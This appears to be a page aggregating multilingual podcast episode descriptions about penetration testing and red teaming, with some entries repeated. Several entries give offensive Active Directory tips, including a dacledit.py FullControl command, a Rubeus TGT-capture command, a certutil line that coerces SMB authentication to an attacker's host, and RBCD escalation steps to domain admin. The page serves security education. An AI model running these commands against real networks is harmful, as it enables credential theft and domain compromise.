Method of evaluating computer and network security by simulating a cyber attack
POPULARITY
Comment ça on a jamais parlé de blue team ? Voilà, cette fois c'est fait, profitez de la masterclass et devenez le maitre des faux-positifs !Les émissions sont enregistrées en live sur Twitch et redifusée sur Youtube avant de devenir des Podcast.Venez assister à l'enregistrement en live !Hébergé par Ausha. Visitez ausha.co/politique-de-confidentialite pour plus d'informations.
Today's a fun tale of pentest pwnage where we leveraged a WinRM service ticket in combination with the shadow credentials attack, then connected to an important system using evil-winrm and make our getaway with some privileged Kerberos TGTs! I also share an (intentionally) vague story about a personal struggle I could use your thoughts/prayers/vibes with.
Joas Santos é especialista em Red Team e traz uma visão prática sobre como pensar segurança de forma ofensiva. Falamos sobre engenharia social, testes de intrusão, inteligência de ameaças, mentoria e os desafios de construir defesas que realmente funcionam. Uma conversa direta com quem está na linha de frente da segurança cibernética no Brasil.
Hola friends! Today's tale of pentest pwnage talks about abusing Exchange and the Azure ADSync account! Links to the discussed things: adconnectdump – for all your ADSync account dumping needs! Adam Chester PowerShell script to dump MSOL service account dacledit.py (part of Impacket) to give myself full write privileges on the MSOL sync account: dacledit.py -action ‘write' -rights ‘FullControl' -principal lowpriv -target MSOL-SYNC-ACCOUNT -dc-ip 1.2.3.4 domain.com/EXCHANGEBOX$ -k -no-pass Looking to tighten up your Exchange permissions – check out this crazy detailed post
In dieser Episode des Human Firewall Podcasts berichtet Gordon Shepherd, Team Leader Infrastructure & Operations bei der Scheuch Group, von einem spektakulären Pentest: Hacker drangen in das Unternehmen ein und entwendeten sogar zwei Firmenwagen. Mit Dr. Christian Reinhardt spricht er darüber, warum man mit solchen Vorkommnissen offen und transparent umgehen muss – und wie (und wann) man das am besten macht. Wie schafft man echte Awareness, ohne mit dem erhobenen Zeigefinger aufzutreten? Gordon teilt seine Erfahrungen – von (zu) überzeugenden Phishing-Simulationen bis hin zu aktuellen KI-Trends. Du willst wissen, welche Trends Gordon für die nächsten Jahre sieht und welche Prioritäten er setzt? Dann höre jetzt die neueste Episode des Human Firewall Podcasts!
On accélère pour ce second épisode... place au phishing et à la red team !Les émissions sont enregistrées en live sur Twitch et redifusée sur Youtube avant de devenir des Podcast.Venez assister à l'enregistrement en live !Hébergé par Ausha. Visitez ausha.co/politique-de-confidentialite pour plus d'informations.
Today we have a smattering of miscellaneous pentest tips to help you pwn all the stuff! Selective Snaffling with Snaffler The importance of having plenty of dropbox disk space – for redundant remote connectivity and PXE abuse! TGTs can be fun for SMB riffling, targeted Snaffling, netexec-ing and Evil-WinRMing!
Domaine omniprésent mais souvent ignoré par les débutants, cette fois on explore les bases du pentest dans les environnements cloud. Première partie pour avoir les bases de méthodologie sur un pentest classique.Les émissions sont enregistrées en live sur Twitch et redifusée sur Youtube avant de devenir des Podcast.Venez assister à l'enregistrement en live !Hébergé par Ausha. Visitez ausha.co/politique-de-confidentialite pour plus d'informations.
HACK THE PLANET !Seconde partie pour découvrir le contenu de la boite à magie et voir autre chose que le Flipper Zero !Les émissions sont enregistrées en live sur Twitch et redifusée sur Youtube avant de devenir des Podcast.Venez assister à l'enregistrement en live !Hébergé par Ausha. Visitez ausha.co/politique-de-confidentialite pour plus d'informations.
HACK THE PLANET ! Première partie pour découvrir le contenu de la boite à magie et voir autre chose que le Flipper Zero !Les émissions sont enregistrées en live sur Twitch et redifusée sur Youtube avant de devenir des Podcast.Venez assister à l'enregistrement en live !Hébergé par Ausha. Visitez ausha.co/politique-de-confidentialite pour plus d'informations.
News includes Erlang/OTP achieving OpenChain ISO certification for open source license compliance, the release of the new "Elixir Patterns" book by Hugo Barauna and Alex Koutmos, a security audit of Oban Web and Pro by Paraxial.io showing excellent results, upcoming Alchemy Conf in Portugal, and a major rewrite of the asdf version manager to Go, and more! Show Notes online - http://podcast.thinkingelixir.com/240 (http://podcast.thinkingelixir.com/240) Elixir Community News https://bsky.app/profile/theerlef.bsky.social/post/3lhc5552djc24 (https://bsky.app/profile/theerlef.bsky.social/post/3lhc5552djc24?utm_source=thinkingelixir&utm_medium=shownotes) – Erlang/OTP team announces compliance with OpenChain ISO/IEC 5230 standard for open source license compliance. https://openchainproject.org/featured/2025/02/01/erlang-otp-iso5230 (https://openchainproject.org/featured/2025/02/01/erlang-otp-iso5230?utm_source=thinkingelixir&utm_medium=shownotes) – Details about OpenChain certification and its importance for Erlang/OTP's 2025 goals for enhancing community infrastructure. https://podcast.thinkingelixir.com/220 (https://podcast.thinkingelixir.com/220?utm_source=thinkingelixir&utm_medium=shownotes) – Reference to Allistair Woodman episode providing additional context about Erlang/OTP. https://www.elixirpatterns.dev/#pricing (https://www.elixirpatterns.dev/#pricing?utm_source=thinkingelixir&utm_medium=shownotes) – New book "Elixir Patterns" by Hugo Barauna and Alex Koutmos has been released. https://bsky.app/profile/hugobarauna.com/post/3lgv5yfw5o22q (https://bsky.app/profile/hugobarauna.com/post/3lgv5yfw5o22q?utm_source=thinkingelixir&utm_medium=shownotes) – Author's announcement about the Elixir Patterns book release. https://www.elixirpatterns.dev/#free-chapters (https://www.elixirpatterns.dev/#free-chapters?utm_source=thinkingelixir&utm_medium=shownotes) – Free sample chapters of Elixir Patterns book available with accompanying Livebooks. https://www.youtube.com/watch?v=AZZvljvgKy8 (https://www.youtube.com/watch?v=AZZvljvgKy8?utm_source=thinkingelixir&utm_medium=shownotes) – Launch livestream recording for the Elixir Patterns book. https://paraxial.io/blog/oban-pentest (https://paraxial.io/blog/oban-pentest?utm_source=thinkingelixir&utm_medium=shownotes) – Security audit results for Oban Web and Oban Pro by Paraxial.io, showing no critical vulnerabilities. https://alchemyconf.com/ (https://alchemyconf.com/?utm_source=thinkingelixir&utm_medium=shownotes) – Announcement for Alchemy Conf happening April 2-3 in Braga Portugal. https://x.com/hugobarauna/status/1886766098411909420 (https://x.com/hugobarauna/status/1886766098411909420?utm_source=thinkingelixir&utm_medium=shownotes) – Hugo Barauna announces he'll be speaking about Livebook and Livebook Teams internals at Alchemy Conf. https://stratus3d.com/blog/2025/02/03/asdf-has-been-rewritten-in-go/ (https://stratus3d.com/blog/2025/02/03/asdf-has-been-rewritten-in-go/?utm_source=thinkingelixir&utm_medium=shownotes) – Announcement about asdf v0.16 major update and rewrite in Go. https://asdf-vm.com/guide/upgrading-to-v0-16.html#installation (https://asdf-vm.com/guide/upgrading-to-v0-16.html#installation?utm_source=thinkingelixir&utm_medium=shownotes) – Installation guide for the new asdf v0.16 with breaking changes. Do you have some Elixir news to share? Tell us at @ThinkingElixir (https://twitter.com/ThinkingElixir) or email at show@thinkingelixir.com (mailto:show@thinkingelixir.com) Find us online - Message the show - Bluesky (https://bsky.app/profile/thinkingelixir.com) - Message the show - X (https://x.com/ThinkingElixir) - Message the show on Fediverse - @ThinkingElixir@genserver.social (https://genserver.social/ThinkingElixir) - Email the show - show@thinkingelixir.com (mailto:show@thinkingelixir.com) - Mark Ericksen on X - @brainlid (https://x.com/brainlid) - Mark Ericksen on Bluesky - @brainlid.bsky.social (https://bsky.app/profile/brainlid.bsky.social) - Mark Ericksen on Fediverse - @brainlid@genserver.social (https://genserver.social/brainlid) - David Bernheisel on Bluesky - @david.bernheisel.com (https://bsky.app/profile/david.bernheisel.com) - David Bernheisel on Fediverse - @dbern@genserver.social (https://genserver.social/dbern)
Today we've got some super cool stuff to cover today! First up, BPATTY v1.4 is out and has a slug of cool things: A whole new section on old-school wifi tools like airmon-ng, aireplay-ng and airodump-ng Syntax on using two different tools to parse creds from Dehashed An updated tutorial on using Gophish for phishing campaigns The cocoa-flavored cherry on top is a tale of pentest pwnage that includes: Abusing SCCM Finding gold in SQL configuration/security audits
Get your FREE 2024 Cybersecurity Salary Guide: https://www.infosecinstitute.com/form/cybersecurity-salary-guide-podcast/?utm_source=audio&utm_medium=podcast&utm_campaign=podcastIn this episode of Cyber Work Hacks, guest James Stanger from CompTIA dives into the PenTest+ certification. He explains the critical distinctions between pentesting and hacking and outlines the essential career skills involved in pentesting, such as network discovery, social engineering and vulnerability analytics. Viewers will also learn about hands-on activities to enhance their resumes and hear valuable advice for entering cybersecurity roles. The episode touches on adjacent career paths like GRC, threat hunting and vulnerability management while providing practical tips for preparing for the PenTest+ exam.00:00 - Introduction to PenTest+ certification01:02 - Overview of cybersecurity job market01:56 - Guest introduction: James Stanger from CompTIA02:33 - Deep dive into PenTest+ certification04:42 - Career paths with PenTest+ certification07:27 - Getting started in pentesting09:12 - Hands-on experience and practical tips10:58 - Study tips for PenTest+ exam11:34 - Conclusion and final thoughtsView Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast/?utm_source=audio&utm_medium=podcast&utm_campaign=podcastAbout InfosecInfosec's mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ's security awareness training. Learn more at infosecinstitute.com.
Erweitern Sie Ihr Wissen über die Zukunft des Pentestings mit der neuesten Episode von Cybersecurity ist Chefsache!Diesmal spricht Nico Werner mit Martin Haunschmid, Geschäftsführer der Adversary GmbH, über die spannenden Möglichkeiten und Herausforderungen von AI im Pentesting.Inhalte der Episode:Automation vs. Menschlichkeit: Wo AI Prozesse erleichtert – und wo sie scheitert.Die Rolle der Intuition: Warum Pentester nach wie vor unverzichtbar sind.Gefahren durch Fehleinschätzungen: Was passiert, wenn AI über Grenzen hinausgeht.Effizienzsteigerung durch AI: Wie Reporting und Checklisten smarter werden.Martin Haunschmid teilt seine Erfahrungen aus der Praxis und erklärt, warum Unternehmen AI als Unterstützung, nicht als Ersatz, sehen sollten. Besonders wichtig: die richtige Balance zwischen Technologie, Erfahrung und ethischer Verantwortung.
Erweitern Sie Ihr Wissen über die Zukunft des Pentestings mit der neuesten Episode von Cybersecurity ist Chefsache!Diesmal spricht Nico Werner mit Martin Haunschmid, Geschäftsführer der Adversary GmbH, über die spannenden Möglichkeiten und Herausforderungen von AI im Pentesting.Inhalte der Episode:Automation vs. Menschlichkeit: Wo AI Prozesse erleichtert – und wo sie scheitert.Die Rolle der Intuition: Warum Pentester nach wie vor unverzichtbar sind.Gefahren durch Fehleinschätzungen: Was passiert, wenn AI über Grenzen hinausgeht.Effizienzsteigerung durch AI: Wie Reporting und Checklisten smarter werden.Martin Haunschmid teilt seine Erfahrungen aus der Praxis und erklärt, warum Unternehmen AI als Unterstützung, nicht als Ersatz, sehen sollten. Besonders wichtig: die richtige Balance zwischen Technologie, Erfahrung und ethischer Verantwortung.
Erweitern Sie Ihr Wissen über die Zukunft des Pentestings mit der neuesten Episode von Cybersecurity ist Chefsache!Diesmal spricht Nico Werner mit Martin Haunschmid, Geschäftsführer der Adversary GmbH, über die spannenden Möglichkeiten und Herausforderungen von AI im Pentesting.Inhalte der Episode:Automation vs. Menschlichkeit: Wo AI Prozesse erleichtert – und wo sie scheitert.Die Rolle der Intuition: Warum Pentester nach wie vor unverzichtbar sind.Gefahren durch Fehleinschätzungen: Was passiert, wenn AI über Grenzen hinausgeht.Effizienzsteigerung durch AI: Wie Reporting und Checklisten smarter werden.Martin Haunschmid teilt seine Erfahrungen aus der Praxis und erklärt, warum Unternehmen AI als Unterstützung, nicht als Ersatz, sehen sollten. Besonders wichtig: die richtige Balance zwischen Technologie, Erfahrung und ethischer Verantwortung.
Hey friends, we've got a short but sweet tale of pentest pwnage for you today. Key lessons learned: Definitely consider BallisKit for your EDR-evasion needs If you get local admin to a box, enumerate, enumerate, enumerate! There might be a delicious task or service set to run as a domain admin that can quickly escalate your privileges!
Oooooo, giggidy! Today is (once again) my favorite tale of pentest pwnage. I learned about a feature of PowerUpSQL that helped me find a “hidden” SQL account, and that account ended up being the key to the entire pentest! I wonder how many hidden SQL accounts I've missed on past pentests….SIGH! Check out the awesome BloodHound gang thread about this here. Also, can't get Rubeus monitor mode to capture TGTs to the registry? Try output to file instead: rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:userspublicsome-innocent-looking-file.log In the tangent department, I talk about a personal music project I'm resurrecting to help my community.
¿Por qué es importante la labor de los hackers? Charlamos con Antonio Fernandes, experto en ciberseguridad y uno de los cazadores de bugs más conocidos de España, con reconocimientos públicos de Google, Facebook, el Departamento de Defensa de EE.UU o la Unión Europea. Además, conocemos si es posible hackear la red ferroviaria de un país con la especialista en hardware hacking Gabriela García, conocida por presentar sus investigaciones en conferencias de ciberseguridad de referencia como la RootedCON, la Black Hat o la DEFCON de las Vegas. En este episodio descubrimos qué son las pruebas de intrusión o pentest y cómo trabajan los hackers éticos para identificar vulnerabilidades antes de que lo hagan los ciberdelincuentes. Suscríbete a nuestro newsletter y podrás escuchar los nuevos episodios en primicia y conocer contenido extra relacionado
Hey! I'm speaking in Wanatchee, Washington next week at the NCESD conference about 7 ways to panic a pentester! Today's tale of pentest pwnage is a great reminder to enumerate, enumerate, enumerate! It also emphases that cracking NETLM/NETNTLMv1 isn't super easy to remember the steps for (at least for me) but this crack.sh article makes it a bit easier!
Le Café de l'e-commerce, c'est le podcast qui vous propose de faire votre veille e-commerce, différemment, dans vos oreilles, même quand la dette publique donne le vertige.Dans cet épisode, on vous parle de TEMU, 2ème site e-commerce le plus visité au monde. De SHEIN, l'entrée en bourse se précise. Du Digital Service Act, qui remonte les bretelles de certaines plateformes, pour une éventuelle non conformité avec la législation européenne. Mais aussi :
Today we continue where we left off in episode 641, but this time talking about how to automatically deploy and install a Ubuntu-based dropbox! I also share some love for exegol as an all-in-one Active Directory pentesting platform.
In today's episode, we'll hear from Craig Jeffery on pentests. What are they, who performs them, and why are they vital for cyber security? Listen in to learn more.
Today we're revisiting the fun world of automating pentest dropboxes using Proxmox, Ansible, Cursor and Level. Plus, a tease about how all this talk about automation is getting us excited for a long-term project: creating a free/community edition of Light Pentest LITE training!
This was my favorite pentest tale of pwnage to date! There's a lot to cover in this episode so I'm going to try and bullet out the TLDR version here: Sprinkled farmer files around the environment Found high-priv boxes with WebClient enabled Added “ghost” machine to the Active Directory (we'll call it GHOSTY) RBCD attack to be able to impersonate a domain admin using the CIFS/SMB service against the victim system where some higher-priv users were sitting Use net.py to add myself to local admin on the victim host Find a vulnerable service to hijack and have run an evil, TGT-gathering Rubeus.exe – found that Credential Guard was cramping my style! Pulled the TGT from a host not protected with Credential Guard Figured out the stolen user's account has some “write” privileges to a domain controller Use rbcd.py to delegate from GHOSTY and to the domain controller Request a TGT for GHOSTY Use getST.py to impersonate CIFS using a domain admin account on the domain controller (important thing here was to specify the DC by its FQDN, not just hostname) Final move: use the domain admin ccache file to leverage net.py and add myself to the Active Directory Administrators group
Today's tale of pentest pwnage talks about the dark powers of the net.py script from impacket.
Today we're talking pentesting – specifically some mini gems that can help you escalate local/domain/SQL privileges: Check the C: drive! If you get local admin and the system itself looks boring, check root of C – might have some interesting scripts or folders with tools that have creds in them. Also look at Look at Get-ScheduledTasks Find ids and passwords easily in Snaffler output with this Snaffler cleaner script There's a ton of gold to (potentially) be found in SQL servers – check out my notes on using PowerUpSQL to find misconfigs and agent jobs you might able to abuse!
Esben Friis-Jensen is the Co-Founder and Chief Growth Officer at Userflow, the fastest way for user onboarding for modern SaaS businesses. He is also the Co-Founder and Adviser at Cobalt, a modern application security platform enabling businesses to run on-demand Penetration Testing and vulnerability assessments - Pentest as a Service. The goal of this episode is to accelerate learning while transitioning from sales-led to product-led. Esben will talk about the whole transition: What other leaders are doing in this transition and what mistakes they make to avoid doing it again. Show Notes [01:09] A brief background about Esben [03:38] His thoughts when they started the product-led movement [07:11] Reasons why they started out as more sales-led [11:15] The challenges they experienced along the way [15:40] How they fostered organizational change [18:55] The process they went through to get the rest of the team onboard [23:32] How they got buy-in from the teams in the process of transitioning [28:49] First quick wins they had in testing the unknowns [34:50] More advice on iteration from Esben [37:42] The next thing for him at Userflow [39:47] Where to find Esben About Esben Friis-Jensen Esben Friis-Jensen is originally from Denmark but has lived in the United States for the last eight years. Aside from Userflow and Cobalt, he has also worked as a consultant in the SAP division of Accenture, responsible for managing the test and deployment of global large-scale SAP implementations. Link Product-Led Slack Profiles Userflow Cobalt LinkedIn
In 7 Minutes on ITSPmagazine Short Brand Story recorded on location during Black Hat USA 2024, Sean Martin had a fascinating conversation with Snehal Antani, CEO and Co-Founder of Horizon3.ai. The discussion revolved around the innovative strides Horizon3.ai is making in autonomous penetration testing and continuous security posture management.Snehal Antani shared his journey from being a CIO to founding Horizon3.ai, highlighting the critical gaps in traditional security measures that led to the inception of the company. The main focus at Horizon3.ai is to continuously verify security postures through autonomous penetration testing, essentially enabling organizations to "hack themselves" regularly to stay ahead of potential threats. Antani explained the firm's concept of “go hack yourself,” which emphasizes continuous penetration testing. This approach ensures that security vulnerabilities are identified and addressed proactively rather than reacting after an incident occurs.A significant portion of the discussion centered around the differentiation between application and infrastructure penetration testing. While application pen testing remains a uniquely human task due to the need for identifying logic flaws in custom code, infrastructure pen testing can be effectively managed by algorithms at scale. This division allows Horizon3.ai to implement a human-machine teaming workflow, optimizing the strengths of both.Antani likened its functionality to installing ring cameras while conducting a pen test, creating an early warning network through the deployment of honey tokens. These tokens are fake credentials and sensitive command tokens designed to attract attackers, triggering alerts when accessed. This early warning system helps organizations build a high signal, low noise alert mechanism, enhancing their ability to detect and respond to threats swiftly.Antani emphasized that Horizon3.ai is not just a pen testing company but a data company. The data collected from each penetration test provides valuable telemetry that improves algorithm accuracy and offers insights into an organization's security posture over time. This data-centric approach allows Horizon3.ai to help clients understand and articulate their security posture's evolution.A compelling example highlighted in the episode involved a CISO from a large chip manufacturing company who utilized Horizon3.ai's rapid response capabilities to address a potential vulnerability swiftly. The CISO was able to identify, test, fix, and verify the resolution of a critical exploit within two hours, showcasing the platform's efficiency and effectiveness.The conversation concluded with a nod to the practical benefits such innovations bring, encapsulating the idea that effective use of Horizon3.ai's tools not only promotes better security outcomes but also enables security teams to perform their roles more efficiently, potentially even getting them home earlier.Learn more about Horizon3.ai: https://itspm.ag/horizon3ai-bh23Note: This story contains promotional content. Learn more.Guest: Snehal Antani, Co-Founder & CEO at Horizon3.ai [@Horizon3ai]On LinkedIn | https://www.linkedin.com/in/snehalantani/On Twitter | https://twitter.com/snehalantaniResourcesLearn more and catch more stories from Horizon3.ai: https://www.itspmagazine.com/directory/horizon3aiView all of our OWASP AppSec Global Lisbon 2024 coverage: https://www.itspmagazine.com/owasp-global-2024-lisbon-application-security-event-coverage-in-portugalLearn more about 7 Minutes on ITSPmagazine Short Brand Story Podcasts: https://www.itspmagazine.com/purchase-programsNewsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-upAre you interested in telling your story?https://www.itspmagazine.com/telling-your-story
In 7 Minutes on ITSPmagazine Short Brand Story recorded on location during Black Hat USA 2024, Sean Martin had a fascinating conversation with Snehal Antani, CEO and Co-Founder of Horizon3.ai. The discussion revolved around the innovative strides Horizon3.ai is making in autonomous penetration testing and continuous security posture management.Snehal Antani shared his journey from being a CIO to founding Horizon3.ai, highlighting the critical gaps in traditional security measures that led to the inception of the company. The main focus at Horizon3.ai is to continuously verify security postures through autonomous penetration testing, essentially enabling organizations to "hack themselves" regularly to stay ahead of potential threats. Antani explained the firm's concept of “go hack yourself,” which emphasizes continuous penetration testing. This approach ensures that security vulnerabilities are identified and addressed proactively rather than reacting after an incident occurs.A significant portion of the discussion centered around the differentiation between application and infrastructure penetration testing. While application pen testing remains a uniquely human task due to the need for identifying logic flaws in custom code, infrastructure pen testing can be effectively managed by algorithms at scale. This division allows Horizon3.ai to implement a human-machine teaming workflow, optimizing the strengths of both.Antani likened its functionality to installing ring cameras while conducting a pen test, creating an early warning network through the deployment of honey tokens. These tokens are fake credentials and sensitive command tokens designed to attract attackers, triggering alerts when accessed. This early warning system helps organizations build a high signal, low noise alert mechanism, enhancing their ability to detect and respond to threats swiftly.Antani emphasized that Horizon3.ai is not just a pen testing company but a data company. The data collected from each penetration test provides valuable telemetry that improves algorithm accuracy and offers insights into an organization's security posture over time. This data-centric approach allows Horizon3.ai to help clients understand and articulate their security posture's evolution.A compelling example highlighted in the episode involved a CISO from a large chip manufacturing company who utilized Horizon3.ai's rapid response capabilities to address a potential vulnerability swiftly. The CISO was able to identify, test, fix, and verify the resolution of a critical exploit within two hours, showcasing the platform's efficiency and effectiveness.The conversation concluded with a nod to the practical benefits such innovations bring, encapsulating the idea that effective use of Horizon3.ai's tools not only promotes better security outcomes but also enables security teams to perform their roles more efficiently, potentially even getting them home earlier.Learn more about Horizon3.ai: https://itspm.ag/horizon3ai-bh23Note: This story contains promotional content. Learn more.Guest: Snehal Antani, Co-Founder & CEO at Horizon3.ai [@Horizon3ai]On LinkedIn | https://www.linkedin.com/in/snehalantani/On Twitter | https://twitter.com/snehalantaniResourcesLearn more and catch more stories from Horizon3.ai: https://www.itspmagazine.com/directory/horizon3aiView all of our OWASP AppSec Global Lisbon 2024 coverage: https://www.itspmagazine.com/owasp-global-2024-lisbon-application-security-event-coverage-in-portugalLearn more about 7 Minutes on ITSPmagazine Short Brand Story Podcasts: https://www.itspmagazine.com/purchase-programsNewsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-upAre you interested in telling your story?https://www.itspmagazine.com/telling-your-story
Hi, today's tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer “crops” to a domain admin's desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:UsersDomain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login
Today's tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU your.kali.ip.addressarbitrary-folder. I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you're on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on evasion! When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you've got the vmss2core utility, which I couldn't find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps. Can't RDP into a victim system that you're PSRemote'd into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp | select-object portnumber` And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!
Hi friends, today's a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud'homme – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds CMLoot – find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares Snaffler – finds all the interesting SMB shares and juicy file contents Efflanrs – takes the raw Snaffler log and turns it into an interactive Web app! RubeusToCcache – a small tool to convert Base64-encoded .kirbi tickets from Rubeus into .ccache files for Impacket
Guest: Abraham Aranguren, Managing Director at 7ASecurity [@7aSecurity]On LinkedIn | https://www.linkedin.com/in/abrahamaranguren/____________________________Hosts: Sean Martin, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining CyberSecurity Podcast [@RedefiningCyber]On ITSPmagazine | https://www.itspmagazine.com/sean-martinMarco Ciappelli, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining Society PodcastOn ITSPmagazine | https://www.itspmagazine.com/itspmagazine-podcast-radio-hosts/marco-ciappelli____________________________Episode NotesIn this On Location episode recorded in Lisbon at the OWASP AppSec Global event, Sean Martin engages in a comprehensive discussion with Abraham Aranguren, a cybersecurity trainer skilled at hacking IoT, iOS, and Android devices. The conversation delves into the intricacies of mobile application security, touching on both the technical and procedural aspects that organizations must consider to build and maintain secure apps.Abraham Aranguren, known for his expertise in cybersecurity training, shares compelling insights into identifying IoT vulnerabilities without physically having the device. By reverse engineering applications, one can uncover potential security flaws and understand how apps communicate with their IoT counterparts. For instance, Aranguren describes exercises where students analyze mobile apps to reveal hardcoded passwords and unsecured Wi-Fi connections used to manage devices like drones.A significant portion of the discussion revolves around real-world examples of security lapses in mobile applications. Aranguren details an incident involving a Chinese government app that harvests personal data from users' phones, highlighting the serious privacy implications of such vulnerabilities. Another poignant example is Hong Kong's COVID-19 contact-tracing app, which stored sensitive user information insecurely, revealing how even high-budget applications can suffer from critical security flaws if not properly tested.Sean Martin, drawing from his background in software quality assurance, emphasizes the importance of establishing clear, repeatable processes and workflows to ensure security measures are consistently applied throughout the development and deployment phases. He and Aranguren agree that while developers need to be educated in secure coding practices, organizations must also implement robust processes, including code reviews, automated tools for static analysis, and third-party audits to identify and rectify potential vulnerabilities.Aranguren stresses the value of pentests, noting that organizations often show significant improvement over multiple tests. He shares experiences of clients who, after several engagements, greatly reduced the number of exploitable vulnerabilities. Regular, comprehensive testing, combined with a proactive approach to fixing identified issues, helps create a robust security posture, ultimately making applications harder to exploit and dissuading potential attackers.For businesses developing apps, this episode underscores the necessity of integrating security from the ground up, continuously educating developers, enforcing centralized security controls, and utilizing pentests as a tool for both validation and education. The ultimate goal is to make applications resilient enough to deter attackers, ensuring both the business and its users are protected.Be sure to follow our Coverage Journey and subscribe to our podcasts!____________________________Follow our OWASP AppSec Global Lisbon 2024 coverage: https://www.itspmagazine.com/owasp-global-2024-lisbon-application-security-event-coverage-in-portugalOn YouTube:
Guest: Abraham Aranguren, Managing Director at 7ASecurity [@7aSecurity]On LinkedIn | https://www.linkedin.com/in/abrahamaranguren/____________________________Hosts: Sean Martin, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining CyberSecurity Podcast [@RedefiningCyber]On ITSPmagazine | https://www.itspmagazine.com/sean-martinMarco Ciappelli, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining Society PodcastOn ITSPmagazine | https://www.itspmagazine.com/itspmagazine-podcast-radio-hosts/marco-ciappelli____________________________Episode NotesIn this On Location episode recorded in Lisbon at the OWASP AppSec Global event, Sean Martin engages in a comprehensive discussion with Abraham Aranguren, a cybersecurity trainer skilled at hacking IoT, iOS, and Android devices. The conversation delves into the intricacies of mobile application security, touching on both the technical and procedural aspects that organizations must consider to build and maintain secure apps.Abraham Aranguren, known for his expertise in cybersecurity training, shares compelling insights into identifying IoT vulnerabilities without physically having the device. By reverse engineering applications, one can uncover potential security flaws and understand how apps communicate with their IoT counterparts. For instance, Aranguren describes exercises where students analyze mobile apps to reveal hardcoded passwords and unsecured Wi-Fi connections used to manage devices like drones.A significant portion of the discussion revolves around real-world examples of security lapses in mobile applications. Aranguren details an incident involving a Chinese government app that harvests personal data from users' phones, highlighting the serious privacy implications of such vulnerabilities. Another poignant example is Hong Kong's COVID-19 contact-tracing app, which stored sensitive user information insecurely, revealing how even high-budget applications can suffer from critical security flaws if not properly tested.Sean Martin, drawing from his background in software quality assurance, emphasizes the importance of establishing clear, repeatable processes and workflows to ensure security measures are consistently applied throughout the development and deployment phases. He and Aranguren agree that while developers need to be educated in secure coding practices, organizations must also implement robust processes, including code reviews, automated tools for static analysis, and third-party audits to identify and rectify potential vulnerabilities.Aranguren stresses the value of pentests, noting that organizations often show significant improvement over multiple tests. He shares experiences of clients who, after several engagements, greatly reduced the number of exploitable vulnerabilities. Regular, comprehensive testing, combined with a proactive approach to fixing identified issues, helps create a robust security posture, ultimately making applications harder to exploit and dissuading potential attackers.For businesses developing apps, this episode underscores the necessity of integrating security from the ground up, continuously educating developers, enforcing centralized security controls, and utilizing pentests as a tool for both validation and education. The ultimate goal is to make applications resilient enough to deter attackers, ensuring both the business and its users are protected.Be sure to follow our Coverage Journey and subscribe to our podcasts!____________________________Follow our OWASP AppSec Global Lisbon 2024 coverage: https://www.itspmagazine.com/owasp-global-2024-lisbon-application-security-event-coverage-in-portugalOn YouTube:
Today's tale of pentest pwnage is all about my new favorite attack called SPN-less RBCD. We did a teaser episode last week that actually ended up being a full episode all about the attack, and even step by step commands to pull it off. But I didn't want today's episode to just be “Hey friends, check out the YouTube version of this attack!” so I also cover: Our first first impressions of Burp Enterprise Why I have a real hard time believing you have to follow all these steps to install Kali on Proxmox
Today's prelude to a tale of pentest pwnage talks about something called “spnless RBCD” (resource-based constrained delegation). The show notes don't format well here in the podcast notes, so head to 7minsec.com to see the notes in all their glory.
#032 - In this next episode, I was joined by Shawn Abelson, physical red teamer, business owner, and graduate faculty member with the University of Minnesota's Security Technology Program. Shawn's led and developed Red Team programs and he has a ton of great insights for those interested in the red team philosophy and how to develop red teaming skills. His experience spans diverse roles in the public and private sectors. Shawn has earned his Master of Science in Security Technologies from the University of Minnesota and now instructs in that same program.Today's conversation focused on what red teaming is, what a typical client engagement looks like, how an aspiring professional could get into physical red teaming, and much more.-- Get the resources and show notes mentioned in this episode --https://thesecuritystudent.com/shownotes
We did something crazy today and recorded an episode that was 7 minutes long! Today we talk about some things that have helped us out in recent pentests: When using Farmer to create “trap” files that coerce authentication, I've found way better results using Windows Search Connectors (.searchConnector-ms) files This matrix of “can I relay this to that” has been super helpful, especially early in engagements
Today's episode is all about writing reports in Sysreptor. It's awesome! Main takeaways: The price is free (they have a paid version as well)! You can send findings and artifacts directly to the report server using the reptor Python module Warning: Sysreptor only exports to PDF (no Word version option!) Sysreptor has helped us write reports faster without sacrificing quality
